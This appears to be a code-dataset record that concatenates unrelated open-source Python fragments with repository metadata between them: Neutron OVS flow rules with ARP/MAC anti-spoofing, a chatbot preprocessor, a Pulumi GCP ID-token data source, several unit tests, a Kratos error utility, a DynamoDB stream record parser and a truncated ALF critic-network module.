dvr_mac, rtr_port): table_id = self._dvr_dst_mac_table_id(network_type) # Match the destination MAC with the DVR MAC (_dp, ofp, ofpp) = self._get_dp() match = self._arp_dvr_dst_mac_match(ofp, ofpp, vlan_tag, dvr_mac) # Incoming packet will come with destination MAC of DVR host MAC from # the ARP Responder. The Source MAC in this case will have the source # MAC of the port MAC that responded from the ARP responder. # So just remove the DVR host MAC from the 'eth_dst' and replace it # with the gateway-mac. The packet should end up in the right the table # for the packet to reach the router interface. actions = [ ofpp.OFPActionSetField(eth_dst=gateway_mac), ofpp.OFPActionPopVlan(), ofpp.OFPActionOutput(rtr_port, 0) ] self.install_apply_actions(table_id=table_id, priority=5, match=match, actions=actions) @staticmethod def _dvr_to_src_mac_match(ofp, ofpp, vlan_tag, dst_mac): return ofpp.OFPMatch(vlan_vid=vlan_tag | ofp.OFPVID_PRESENT, eth_dst=dst_mac) @staticmethod def _dvr_to_src_mac_table_id(network_type): if network_type == p_const.TYPE_VLAN: return constants.DVR_TO_SRC_MAC_VLAN else: return constants.DVR_TO_SRC_MAC def install_dvr_to_src_mac(self, network_type, vlan_tag, gateway_mac, dst_mac, dst_port): table_id = self._dvr_to_src_mac_table_id(network_type) (_dp, ofp, ofpp) = self._get_dp() match = self._dvr_to_src_mac_match(ofp, ofpp, vlan_tag=vlan_tag, dst_mac=dst_mac) actions = [ ofpp.OFPActionSetField(eth_src=gateway_mac), ] instructions = [ ofpp.OFPInstructionActions(ofp.OFPIT_APPLY_ACTIONS, actions), ofpp.OFPInstructionGotoTable(table_id=constants.TRANSIENT_TABLE), ] self.install_instructions(table_id=table_id, priority=4, match=match, instructions=instructions) actions = [ ofpp.OFPActionPopVlan(), ofpp.OFPActionOutput(dst_port, 0), ] self.install_apply_actions(table_id=constants.TRANSIENT_TABLE, priority=4, match=match, actions=actions) def delete_dvr_to_src_mac(self, network_type, vlan_tag, dst_mac): table_id = self._dvr_to_src_mac_table_id(network_type) (_dp, ofp, ofpp) = self._get_dp() match = self._dvr_to_src_mac_match(ofp, ofpp, vlan_tag=vlan_tag, dst_mac=dst_mac) for table in (table_id, constants.TRANSIENT_TABLE): self.uninstall_flows( strict=True, priority=4, table_id=table, match=match) def add_dvr_mac_vlan(self, mac, port): self.install_goto(table_id=constants.LOCAL_SWITCHING, priority=4, in_port=port, eth_src=mac, dest_table_id=constants.DVR_TO_SRC_MAC_VLAN) def remove_dvr_mac_vlan(self, mac): # REVISIT(yamamoto): match in_port as well? self.uninstall_flows(table_id=constants.LOCAL_SWITCHING, eth_src=mac) def add_dvr_mac_tun(self, mac, port): self.install_goto(table_id=constants.LOCAL_SWITCHING, priority=2, in_port=port, eth_src=mac, dest_table_id=constants.DVR_TO_SRC_MAC) def remove_dvr_mac_tun(self, mac, port): self.uninstall_flows(table_id=constants.LOCAL_SWITCHING, in_port=port, eth_src=mac) def delete_dvr_dst_mac_for_arp(self, network_type, vlan_tag, gateway_mac, dvr_mac, rtr_port): table_id = self._dvr_to_src_mac_table_id(network_type) (_dp, ofp, ofpp) = self._get_dp() match = self._arp_dvr_dst_mac_match(ofp, ofpp, vlan_tag, dvr_mac) self.uninstall_flows( strict=True, priority=5, table_id=table_id, match=match) def add_dvr_gateway_mac_arp_vlan(self, mac, port): self.install_goto(table_id=constants.LOCAL_SWITCHING, priority=5, in_port=port, eth_dst=mac, dest_table_id=constants.ARP_DVR_MAC_TO_DST_MAC_VLAN) def remove_dvr_gateway_mac_arp_vlan(self, mac, port): self.uninstall_flows(table_id=constants.LOCAL_SWITCHING, eth_dst=mac) def add_dvr_gateway_mac_arp_tun(self, mac, port): self.install_goto(table_id=constants.LOCAL_SWITCHING, priority=5, in_port=port, eth_dst=mac, dest_table_id=constants.ARP_DVR_MAC_TO_DST_MAC) def remove_dvr_gateway_mac_arp_tun(self, mac, port): self.uninstall_flows(table_id=constants.LOCAL_SWITCHING, eth_dst=mac) @staticmethod def _arp_reply_match(ofp, ofpp, port): return ofpp.OFPMatch(in_port=port, eth_type=ether_types.ETH_TYPE_ARP) @staticmethod def _icmpv6_reply_match(ofp, ofpp, port): return ofpp.OFPMatch(in_port=port, eth_type=ether_types.ETH_TYPE_IPV6, ip_proto=in_proto.IPPROTO_ICMPV6, icmpv6_type=icmpv6.ND_NEIGHBOR_ADVERT) def install_icmpv6_na_spoofing_protection(self, port, ip_addresses): # Allow neighbor advertisements as long as they match addresses # that actually belong to the port. for ip in ip_addresses: masked_ip = self._cidr_to_os_ken(ip) self.install_goto( table_id=constants.ARP_SPOOF_TABLE, priority=2, eth_type=ether_types.ETH_TYPE_IPV6, ip_proto=in_proto.IPPROTO_ICMPV6, icmpv6_type=icmpv6.ND_NEIGHBOR_ADVERT, ipv6_nd_target=masked_ip, in_port=port, dest_table_id=constants.TRANSIENT_TABLE) # Now that the rules are ready, direct icmpv6 neighbor advertisement # traffic from the port into the anti-spoof table. (_dp, ofp, ofpp) = self._get_dp() match = self._icmpv6_reply_match(ofp, ofpp, port=port) self.install_goto(table_id=constants.LOCAL_SWITCHING, priority=10, match=match, dest_table_id=constants.ARP_SPOOF_TABLE) def set_allowed_macs_for_port(self, port, mac_addresses=None, allow_all=False): if allow_all: self.uninstall_flows(table_id=constants.LOCAL_SWITCHING, in_port=port) self.uninstall_flows(table_id=constants.MAC_SPOOF_TABLE, in_port=port) return mac_addresses = mac_addresses or [] for address in mac_addresses: self.install_goto( table_id=constants.MAC_SPOOF_TABLE, priority=2, eth_src=address, in_port=port, dest_table_id=constants.TRANSIENT_TABLE) # normalize so we can see if macs are the same mac_addresses = {netaddr.EUI(mac) for mac in mac_addresses} flows = self.dump_flows(constants.MAC_SPOOF_TABLE) for flow in flows: matches = dict(flow.match.items()) if matches.get('in_port') != port: continue if not matches.get('eth_src'): continue flow_mac = matches['eth_src'] if netaddr.EUI(flow_mac) not in mac_addresses: self.uninstall_flows(table_id=constants.MAC_SPOOF_TABLE, in_port=port, eth_src=flow_mac) self.install_goto(table_id=constants.LOCAL_SWITCHING, priority=9, in_port=port, dest_table_id=constants.MAC_SPOOF_TABLE) def install_arp_spoofing_protection(self, port, ip_addresses): # allow ARP replies as long as they match addresses that actually # belong to the port. for ip in ip_addresses: masked_ip = self._cidr_to_os_ken(ip) self.install_goto(table_id=constants.ARP_SPOOF_TABLE, priority=2, eth_type=ether_types.ETH_TYPE_ARP, arp_spa=masked_ip, in_port=port, dest_table_id=constants.MAC_SPOOF_TABLE) # Now that the rules are ready, direct ARP traffic from the port into # the anti-spoof table. # This strategy fails gracefully because OVS versions that can't match # on ARP headers will just process traffic normally. (_dp, ofp, ofpp) = self._get_dp() match = self._arp_reply_match(ofp, ofpp, port=port) self.install_goto(table_id=constants.LOCAL_SWITCHING, priority=10, match=match, dest_table_id=constants.ARP_SPOOF_TABLE) def delete_arp_spoofing_protection(self, port): (_dp, ofp, ofpp) = self._get_dp() match = self._arp_reply_match(ofp, ofpp, port=port) self.uninstall_flows(table_id=constants.LOCAL_SWITCHING, match=match) match = self._icmpv6_reply_match(ofp, ofpp, port=port) self.uninstall_flows(table_id=constants.LOCAL_SWITCHING, match=match) self.delete_arp_spoofing_allow_rules(port) def delete_arp_spoofing_allow_rules(self, port): self.uninstall_flows(table_id=constants.ARP_SPOOF_TABLE, in_port=port)
43.18806
79
0.612593
76f89d6ed21f57f192af8a22823cdc0be00c5b14
1,455
py
Python
src/programy/processors/pre/toupper.py
motazsaad/fit-bot-fb-clt
580477aa1ec91855b621d9ae276f2705962f6a87
[ "MIT" ]
null
null
null
src/programy/processors/pre/toupper.py
motazsaad/fit-bot-fb-clt
580477aa1ec91855b621d9ae276f2705962f6a87
[ "MIT" ]
null
null
null
src/programy/processors/pre/toupper.py
motazsaad/fit-bot-fb-clt
580477aa1ec91855b621d9ae276f2705962f6a87
[ "MIT" ]
4
2019-04-01T15:42:23.000Z
2020-11-05T08:14:27.000Z
""" Copyright (c) 2016-2019 Keith Sterling http://www.keithsterling.com Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. """ from programy.utils.logging.ylogger import YLogger from programy.processors.processing import PreProcessor class ToUpperPreProcessor(PreProcessor): def __init__(self): PreProcessor.__init__(self) def process(self, context, word_string): YLogger.debug(context, "Making input upper case...") return word_string.upper()
46.935484
120
0.78488
5c6f2643158c5882f235bd6151fbbff18c71463f
7,997
py
Python
sdk/python/pulumi_gcp/serviceaccount/get_account_id_token.py
sisisin/pulumi-gcp
af6681d70ea457843409110c1324817fe55f68ad
[ "ECL-2.0", "Apache-2.0" ]
121
2018-06-18T19:16:42.000Z
2022-03-31T06:06:48.000Z
sdk/python/pulumi_gcp/serviceaccount/get_account_id_token.py
sisisin/pulumi-gcp
af6681d70ea457843409110c1324817fe55f68ad
[ "ECL-2.0", "Apache-2.0" ]
492
2018-06-22T19:41:03.000Z
2022-03-31T15:33:53.000Z
sdk/python/pulumi_gcp/serviceaccount/get_account_id_token.py
sisisin/pulumi-gcp
af6681d70ea457843409110c1324817fe55f68ad
[ "ECL-2.0", "Apache-2.0" ]
43
2018-06-19T01:43:13.000Z
2022-03-23T22:43:37.000Z
# coding=utf-8 # *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. *** # *** Do not edit by hand unless you're certain you know what you are doing! *** import warnings import pulumi import pulumi.runtime from typing import Any, Mapping, Optional, Sequence, Union, overload from .. import _utilities __all__ = [ 'GetAccountIdTokenResult', 'AwaitableGetAccountIdTokenResult', 'get_account_id_token', 'get_account_id_token_output', ] @pulumi.output_type class GetAccountIdTokenResult: """ A collection of values returned by getAccountIdToken. """ def __init__(__self__, delegates=None, id=None, id_token=None, include_email=None, target_audience=None, target_service_account=None): if delegates and not isinstance(delegates, list): raise TypeError("Expected argument 'delegates' to be a list") pulumi.set(__self__, "delegates", delegates) if id and not isinstance(id, str): raise TypeError("Expected argument 'id' to be a str") pulumi.set(__self__, "id", id) if id_token and not isinstance(id_token, str): raise TypeError("Expected argument 'id_token' to be a str") pulumi.set(__self__, "id_token", id_token) if include_email and not isinstance(include_email, bool): raise TypeError("Expected argument 'include_email' to be a bool") pulumi.set(__self__, "include_email", include_email) if target_audience and not isinstance(target_audience, str): raise TypeError("Expected argument 'target_audience' to be a str") pulumi.set(__self__, "target_audience", target_audience) if target_service_account and not isinstance(target_service_account, str): raise TypeError("Expected argument 'target_service_account' to be a str") pulumi.set(__self__, "target_service_account", target_service_account) @property @pulumi.getter def delegates(self) -> Optional[Sequence[str]]: return pulumi.get(self, "delegates") @property @pulumi.getter def id(self) -> str: """ The provider-assigned unique ID for this managed resource. """ return pulumi.get(self, "id") @property @pulumi.getter(name="idToken") def id_token(self) -> str: """ The `id_token` representing the new generated identity. """ return pulumi.get(self, "id_token") @property @pulumi.getter(name="includeEmail") def include_email(self) -> Optional[bool]: return pulumi.get(self, "include_email") @property @pulumi.getter(name="targetAudience") def target_audience(self) -> str: return pulumi.get(self, "target_audience") @property @pulumi.getter(name="targetServiceAccount") def target_service_account(self) -> Optional[str]: return pulumi.get(self, "target_service_account") class AwaitableGetAccountIdTokenResult(GetAccountIdTokenResult): # pylint: disable=using-constant-test def __await__(self): if False: yield self return GetAccountIdTokenResult( delegates=self.delegates, id=self.id, id_token=self.id_token, include_email=self.include_email, target_audience=self.target_audience, target_service_account=self.target_service_account) def get_account_id_token(delegates: Optional[Sequence[str]] = None, include_email: Optional[bool] = None, target_audience: Optional[str] = None, target_service_account: Optional[str] = None, opts: Optional[pulumi.InvokeOptions] = None) -> AwaitableGetAccountIdTokenResult: """ This data source provides a Google OpenID Connect (`oidc`) `id_token`. Tokens issued from this data source are typically used to call external services that accept OIDC tokens for authentication (e.g. [Google Cloud Run](https://cloud.google.com/run/docs/authenticating/service-to-service)). For more information see [OpenID Connect](https://openid.net/specs/openid-connect-core-1_0.html#IDToken). ## Example Usage ### ServiceAccount JSON Credential File. `service_account.get_account_id_token` will use the configured provider credentials ### Service Account Impersonation. `service_account.get_account_access_token` will use background impersonated credentials provided by `service_account.get_account_access_token`. Note: to use the following, you must grant `target_service_account` the `roles/iam.serviceAccountTokenCreator` role on itself. :param Sequence[str] delegates: Delegate chain of approvals needed to perform full impersonation. Specify the fully qualified service account name. Used only when using impersonation mode. :param bool include_email: Include the verified email in the claim. Used only when using impersonation mode. :param str target_audience: The audience claim for the `id_token`. :param str target_service_account: The email of the service account being impersonated. Used only when using impersonation mode. """ __args__ = dict() __args__['delegates'] = delegates __args__['includeEmail'] = include_email __args__['targetAudience'] = target_audience __args__['targetServiceAccount'] = target_service_account if opts is None: opts = pulumi.InvokeOptions() if opts.version is None: opts.version = _utilities.get_version() __ret__ = pulumi.runtime.invoke('gcp:serviceAccount/getAccountIdToken:getAccountIdToken', __args__, opts=opts, typ=GetAccountIdTokenResult).value return AwaitableGetAccountIdTokenResult( delegates=__ret__.delegates, id=__ret__.id, id_token=__ret__.id_token, include_email=__ret__.include_email, target_audience=__ret__.target_audience, target_service_account=__ret__.target_service_account) @_utilities.lift_output_func(get_account_id_token) def get_account_id_token_output(delegates: Optional[pulumi.Input[Optional[Sequence[str]]]] = None, include_email: Optional[pulumi.Input[Optional[bool]]] = None, target_audience: Optional[pulumi.Input[str]] = None, target_service_account: Optional[pulumi.Input[Optional[str]]] = None, opts: Optional[pulumi.InvokeOptions] = None) -> pulumi.Output[GetAccountIdTokenResult]: """ This data source provides a Google OpenID Connect (`oidc`) `id_token`. Tokens issued from this data source are typically used to call external services that accept OIDC tokens for authentication (e.g. [Google Cloud Run](https://cloud.google.com/run/docs/authenticating/service-to-service)). For more information see [OpenID Connect](https://openid.net/specs/openid-connect-core-1_0.html#IDToken). ## Example Usage ### ServiceAccount JSON Credential File. `service_account.get_account_id_token` will use the configured provider credentials ### Service Account Impersonation. `service_account.get_account_access_token` will use background impersonated credentials provided by `service_account.get_account_access_token`. Note: to use the following, you must grant `target_service_account` the `roles/iam.serviceAccountTokenCreator` role on itself. :param Sequence[str] delegates: Delegate chain of approvals needed to perform full impersonation. Specify the fully qualified service account name. Used only when using impersonation mode. :param bool include_email: Include the verified email in the claim. Used only when using impersonation mode. :param str target_audience: The audience claim for the `id_token`. :param str target_service_account: The email of the service account being impersonated. Used only when using impersonation mode. """ ...
46.494186
295
0.706515
821a721b64769294520d104af98bcbbc00388599
1,147
py
Python
mojo/public/tools/bindings/pylib/mojom_tests/generate/module_unittest.py
kjthegod/chromium
cf940f7f418436b77e15b1ea23e6fa100ca1c91a
[ "BSD-3-Clause-No-Nuclear-License-2014", "BSD-3-Clause" ]
8
2016-02-08T11:59:31.000Z
2020-05-31T15:19:54.000Z
mojo/public/tools/bindings/pylib/mojom_tests/generate/module_unittest.py
kjthegod/chromium
cf940f7f418436b77e15b1ea23e6fa100ca1c91a
[ "BSD-3-Clause-No-Nuclear-License-2014", "BSD-3-Clause" ]
1
2021-05-05T11:11:31.000Z
2021-05-05T11:11:31.000Z
mojo/public/tools/bindings/pylib/mojom_tests/generate/module_unittest.py
kjthegod/chromium
cf940f7f418436b77e15b1ea23e6fa100ca1c91a
[ "BSD-3-Clause-No-Nuclear-License-2014", "BSD-3-Clause" ]
7
2016-02-09T09:28:14.000Z
2020-07-25T19:03:36.000Z
# Copyright 2014 The Chromium Authors. All rights reserved. # Use of this source code is governed by a BSD-style license that can be # found in the LICENSE file. import imp import os.path import sys import unittest def _GetDirAbove(dirname): """Returns the directory "above" this file containing |dirname| (which must also be "above" this file).""" path = os.path.abspath(__file__) while True: path, tail = os.path.split(path) assert tail if tail == dirname: return path try: imp.find_module("mojom") except ImportError: sys.path.append(os.path.join(_GetDirAbove("pylib"), "pylib")) from mojom.generate import module as mojom class ModuleTest(unittest.TestCase): def testNonInterfaceAsInterfaceRequest(self): """Tests that a non-interface cannot be used for interface requests.""" module = mojom.Module('test_module', 'test_namespace') struct = mojom.Struct('TestStruct', module=module) with self.assertRaises(Exception) as e: mojom.InterfaceRequest(struct) self.assertEquals( e.exception.__str__(), 'Interface request requires \'x:TestStruct\' to be an interface.')
30.184211
77
0.721011
d98224a343ca9d1555a85ac8d9620d433b8245cd
3,132
py
Python
weedcoco/tests/index/test_indexing.py
Sydney-Informatics-Hub/Weed-ID-Interchange
d27891c2148de54d03727f688f8b6c6c414ec09b
[ "MIT" ]
14
2021-11-29T12:16:59.000Z
2022-03-20T00:26:10.000Z
weedcoco/tests/index/test_indexing.py
Sydney-Informatics-Hub/Weed-ID-Interchange
d27891c2148de54d03727f688f8b6c6c414ec09b
[ "MIT" ]
282
2020-07-10T00:52:21.000Z
2021-03-01T06:58:05.000Z
weedcoco/tests/index/test_indexing.py
Sydney-Informatics-Hub/Weed-ID-Interchange
d27891c2148de54d03727f688f8b6c6c414ec09b
[ "MIT" ]
2
2020-10-07T06:12:39.000Z
2021-02-02T05:21:32.000Z
import pathlib import pytest from elasticmock import elasticmock as elasticmock from weedcoco.index.indexing import main, ElasticSearchIndexer BASIC_INPUT_PATH = str( pathlib.Path(__file__).parent.parent / "repo" / "deposit_data" / "basic_1" / "weedcoco.json" ) THUMBNAIL_DIR = "arbitrary-thumbnail-dir" @elasticmock def test_smoke_indexing(): # run indexing but check nothing main( [ "--weedcoco-path", BASIC_INPUT_PATH, "--thumbnail-dir", THUMBNAIL_DIR, "--upload-id", "12345", ] ) def test_batch_generation(): # TODO pytest.xfail("Not yet implemented") def test_task_type(): indexer = ElasticSearchIndexer( weedcoco_path=BASIC_INPUT_PATH, thumbnail_dir=THUMBNAIL_DIR ) for entry in indexer.generate_index_entries(): assert isinstance(entry["task_type"], list) # TODO: test the task type for different input annotation data # TODO: test for "segmentation": [] pytest.xfail("Not yet implemented") def test_annotation_and_category(): "Check annotations and categories are correctly indexed with each image" indexer = ElasticSearchIndexer( weedcoco_path=BASIC_INPUT_PATH, thumbnail_dir=THUMBNAIL_DIR ) expected_names = { 0: {"name": "crop: daucus carota", "taxo_names": {"crop: daucus carota"}}, 1: {"name": "weed: UNSPECIFIED", "taxo_names": {"weed: UNSPECIFIED", "weed"}}, 2: { "name": "weed: sonchus oleraceus", "taxo_names": { "weed: sonchus oleraceus", "weed: non-poaceae", "weed: asteraceae", "weed", }, }, 3: { "name": "weed: lolium perenne", "taxo_names": {"weed: lolium perenne", "weed: poaceae", "weed"}, }, } for entry in indexer.generate_index_entries(): assert entry["annotations"] # TODO: check correct number of annotations for annotation in entry["annotations"]: category_id = annotation["category_id"] assert annotation["category"]["name"] == expected_names[category_id]["name"] assert ( set(annotation["category"]["taxo_names"]) == expected_names[category_id]["taxo_names"] ) def test_growth_range(): indexer = ElasticSearchIndexer( weedcoco_path=BASIC_INPUT_PATH, thumbnail_dir=THUMBNAIL_DIR ) for entry in indexer.generate_index_entries(): growth_range = entry["agcontext"]["bbch_growth_range"] assert growth_range == {"min": 10, "max": 20} growth_stage_texts = entry["agcontext"]["growth_stage_texts"] assert len(growth_stage_texts) == 2 assert entry["agcontext"]["growth_stage_min_text"] in growth_stage_texts assert entry["agcontext"]["growth_stage_max_text"] in growth_stage_texts assert ( entry["agcontext"]["growth_stage_max_text"] != entry["agcontext"]["growth_stage_min_text"] ) # TODO: test remove_other_versions
31.636364
88
0.620051
165919830f020d83e9ad652431ad1033d8356db4
2,487
py
Python
lambdAWS/record.py
wesky93/lambdAWS
6ffa45f09284d07c02a2ce47a0665efa2c6b051a
[ "MIT" ]
null
null
null
lambdAWS/record.py
wesky93/lambdAWS
6ffa45f09284d07c02a2ce47a0665efa2c6b051a
[ "MIT" ]
null
null
null
lambdAWS/record.py
wesky93/lambdAWS
6ffa45f09284d07c02a2ce47a0665efa2c6b051a
[ "MIT" ]
null
null
null
from boto3.dynamodb.types import TypeDeserializer class Record : def __init__( self, raw_record ) : self.raw = raw_record self.resource = self.raw[ 'eventSource' ][ 4 : ] self.region = self.raw[ 'awsRegion' ] self.eventID = self.raw[ 'eventID' ] try : self.eventName = self.raw[ 'eventName' ] except KeyError : pass self.get_item() def get_item( self ) : """ 이 메소드를 오버라이드하여 각 리소스에 맞는 정보를 추출한다 :return: """ pass # DynamoDB Stream Event class DDBStream( Record ) : """ DynamoDB Stream Event를 통해 들어온 정보를 파이썬으로 직졀화합니다. Stream Event중 KEYS_ONLY,OLD_IMAGE,NewImage 이 3가지는 필드명으로 메소드 접근이 가능하다. ex) abc라는 필드 명이 있을 경우 DDBStream().abc 로 필드 값을 확인 가능함 다만 NEW_AND_OLD_IMAGES일 경우 이전 값과 새로운 값을 모두 받아 들이기에 이전값을 self._old에 딕셔너리 형태로 저장함 """ def get_item( self ) : def deserialize( value ) : """ boto3.dynamodb.types.TypeDeserializer을 이용하여 각 속성 값을 직렬화 :param value: ddb field dict, ex) {"S":"foobar"} :return: """ return TypeDeserializer().deserialize( value ) def get_attribute( dic: dict ) : """ dict형식의 값을 파이썬 딕셔너리로 직렬화 :param dic: :return: """ attr = dic item = { } for key, value in attr.items() : item[ 'key' ] = deserialize( value ) return item raw = self.raw[ 'dynamodb' ] # 키값 직렬화 keys = get_attribute( raw[ 'Keys' ] ) self.__dict__.update( keys ) # 스트림 종류에 따른 호출값 분기 streamType = raw[ 'StreamViewType' ] if streamType == 'KEYS_ONLY' : pass elif streamType == 'NEW_IMAGE' : new = get_attribute( raw[ 'NewImage' ] ) self.__dict__.update( new ) elif streamType == 'OLD_IMAGE' : old = get_attribute( raw[ 'OldImage' ] ) self.__dict__.update( old ) elif streamType == 'NEW_AND_OLD_IMAGES' : new = get_attribute( raw[ 'NewImage' ] ) old = get_attribute( raw[ 'OldImage' ] ) self.__dict__.update( new ) self.__dict__.update( { '_old' : old } ) else : raise KeyError # S3 Event class S3( Record ) : pass # Sns Event class Sns( Record ) : pass # S3 -> Sns Event class S3Sns( Record ) : pass
26.178947
73
0.527543
74e12a3e592fa92d61391f88fc3f0a4f24806610
2,661
py
Python
applications/SwimmingDEMApplication/python_scripts/L2_error_calculator_utility.py
clazaro/Kratos
b947b82c90dfcbf13d60511427f85990d36b90be
[ "BSD-4-Clause" ]
778
2017-01-27T16:29:17.000Z
2022-03-30T03:01:51.000Z
applications/SwimmingDEMApplication/python_scripts/L2_error_calculator_utility.py
clazaro/Kratos
b947b82c90dfcbf13d60511427f85990d36b90be
[ "BSD-4-Clause" ]
6,634
2017-01-15T22:56:13.000Z
2022-03-31T15:03:36.000Z
applications/SwimmingDEMApplication/python_scripts/L2_error_calculator_utility.py
clazaro/Kratos
b947b82c90dfcbf13d60511427f85990d36b90be
[ "BSD-4-Clause" ]
224
2017-02-07T14:12:49.000Z
2022-03-06T23:09:34.000Z
from __future__ import print_function, absolute_import, division # makes KratosMultiphysics backward compatible with python 2.6 and 2.7 # importing the Kratos Library import KratosMultiphysics from KratosMultiphysics import Vector import KratosMultiphysics.SwimmingDEMApplication as SDEM import sys class L2ErrorCalculatorUtility: def __init__(self, model, parameters): """The default constructor of the class. Keyword arguments: self -- It signifies an instance of a class. model -- the container of the different model parts. """ self.model_part = model self.u_characteristic = parameters["fluid_parameters"]["processes"]["initial_conditions_process_list"][0]["Parameters"]["benchmark_parameters"]["u_char"].GetDouble() for element in self.model_part.Elements: rho = element.Properties.GetValue(KratosMultiphysics.DENSITY) break self.p_characteristic = (1/2)*rho*self.u_characteristic**2 self.model = KratosMultiphysics.Model() self.element_name = "Element3D4N" self.error_model_part = self.model.CreateModelPart("ErrorModelPart") self.error_model_part.AddNodalSolutionStepVariable(SDEM.VECTORIAL_ERROR) self.error_model_part.AddNodalSolutionStepVariable(SDEM.SCALAR_ERROR) self.error_model_part.AddNodalSolutionStepVariable(SDEM.ERROR_X) self.error_model_part.AddNodalSolutionStepVariable(SDEM.ERROR_Y) self.error_model_part.AddNodalSolutionStepVariable(SDEM.ERROR_Z) self.error_model_part.AddNodalSolutionStepVariable(SDEM.ERROR_P) model_part_cloner = KratosMultiphysics.ConnectivityPreserveModeler() model_part_cloner.GenerateModelPart(self.model_part, self.error_model_part, self.element_name) self.error_model_part.ProcessInfo = self.model_part.ProcessInfo def CalculateL2(self): self.ComputeDofsErrors(self.error_model_part) self.velocity_error_norm = self.VectorL2ErrorNorm(self.error_model_part) self.pressure_error_norm = self.ScalarL2ErrorNorm(self.error_model_part) return self.velocity_error_norm/self.u_characteristic, self.pressure_error_norm/self.p_characteristic, self.error_model_part def ComputeDofsErrors(self, error_model_part): SDEM.L2ErrorNormCalculator().ComputeDofsErrors(self.error_model_part) def VectorL2ErrorNorm(self, error_model_part): return SDEM.L2ErrorNormCalculator().GetL2VectorErrorNorm(self.error_model_part) def ScalarL2ErrorNorm(self, error_model_part): return SDEM.L2ErrorNormCalculator().GetL2ScalarErrorNorm(self.error_model_part)
44.35
173
0.765502
effee3954185be2bc93f6a770225811ef82f0091
227
py
Python
src/python/Sailing/src/sailing/core/sailor.py
emop/task-worker
c97cd432d46c73e3e0908d55e7cd10de0afc0854
[ "BSD-2-Clause" ]
1
2021-09-01T09:54:38.000Z
2021-09-01T09:54:38.000Z
src/python/Sailing/src/sailing/core/sailor.py
emop/task-worker
c97cd432d46c73e3e0908d55e7cd10de0afc0854
[ "BSD-2-Clause" ]
null
null
null
src/python/Sailing/src/sailing/core/sailor.py
emop/task-worker
c97cd432d46c73e3e0908d55e7cd10de0afc0854
[ "BSD-2-Clause" ]
1
2015-09-19T05:25:31.000Z
2015-09-19T05:25:31.000Z
class Sailor(object): def ready(self): pass def idle(self): pass def start(self, task): pass def waiting(self): pass def shutdown(self): pass
13.352941
26
0.462555
49f08b393d07917b325ed43a2090356fef9e896d
1,619
py
Python
tests/unit_tests/periodic/test_aggregate_and_send_metrics.py
briandcho/unleash-client-python
ce7f69028265fd7aae774aa41144b4f5e078c91d
[ "MIT" ]
null
null
null
tests/unit_tests/periodic/test_aggregate_and_send_metrics.py
briandcho/unleash-client-python
ce7f69028265fd7aae774aa41144b4f5e078c91d
[ "MIT" ]
null
null
null
tests/unit_tests/periodic/test_aggregate_and_send_metrics.py
briandcho/unleash-client-python
ce7f69028265fd7aae774aa41144b4f5e078c91d
[ "MIT" ]
null
null
null
import json from datetime import datetime, timezone, timedelta import responses from fcache.cache import FileCache from tests.utilities.testing_constants import URL, APP_NAME, INSTANCE_ID, CUSTOM_HEADERS, IP_LIST from UnleashClient.constants import METRICS_URL, METRIC_LAST_SENT_TIME from UnleashClient.periodic_tasks import aggregate_and_send_metrics from UnleashClient.features import Feature from UnleashClient.strategies import RemoteAddress, Default FULL_METRICS_URL = URL + METRICS_URL print(FULL_METRICS_URL) @responses.activate def test_aggregate_and_send_metrics(): responses.add(responses.POST, FULL_METRICS_URL, json={}, status=200) start_time = datetime.now(timezone.utc) - timedelta(seconds=60) cache = FileCache("TestCache") cache[METRIC_LAST_SENT_TIME] = start_time strategies = [RemoteAddress(parameters={"IPs": IP_LIST}), Default()] my_feature1 = Feature("My Feature1", True, strategies) my_feature1.yes_count = 1 my_feature1.no_count = 1 my_feature2 = Feature("My Feature2", True, strategies) my_feature2.yes_count = 2 my_feature2.no_count = 2 features = {"My Feature1": my_feature1, "My Feature 2": my_feature2} aggregate_and_send_metrics(URL, APP_NAME, INSTANCE_ID, CUSTOM_HEADERS, features, cache) assert len(responses.calls) == 1 request = json.loads(responses.calls[0].request.body) assert len(request['bucket']["toggles"].keys()) == 2 assert request['bucket']["toggles"]["My Feature1"]["yes"] == 1 assert request['bucket']["toggles"]["My Feature1"]["no"] == 1 assert cache[METRIC_LAST_SENT_TIME] > start_time
37.651163
97
0.757875
72a910cc223e73a2840a87860bc942dd1ca5c0e4
14,681
py
Python
alf/networks/critic_networks.py
breakds/alf
b3d60048daee2c9625ba44f778e49570d0d029a7
[ "Apache-2.0" ]
1
2021-11-17T17:08:04.000Z
2021-11-17T17:08:04.000Z
alf/networks/critic_networks.py
ipsec/alf
15fd71896eac5ad0987dbe14a9f630b32e0e131f
[ "Apache-2.0" ]
null
null
null
alf/networks/critic_networks.py
ipsec/alf
15fd71896eac5ad0987dbe14a9f630b32e0e131f
[ "Apache-2.0" ]
null
null
null
# Copyright (c) 2020 Horizon Robotics and ALF Contributors. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """CriticNetworks""" import functools import math import torch import alf import alf.utils.math_ops as math_ops import alf.nest as nest from alf.initializers import variance_scaling_init from alf.tensor_specs import TensorSpec from .encoding_networks import EncodingNetwork, LSTMEncodingNetwork, ParallelEncodingNetwork def _check_action_specs_for_critic_networks( action_spec, action_input_processors, action_preprocessing_combiner): if len(nest.flatten(action_spec)) > 1: assert action_preprocessing_combiner is not None, ( "An action combiner is needed when there are multiple action specs:" " {}".format(action_spec)) def 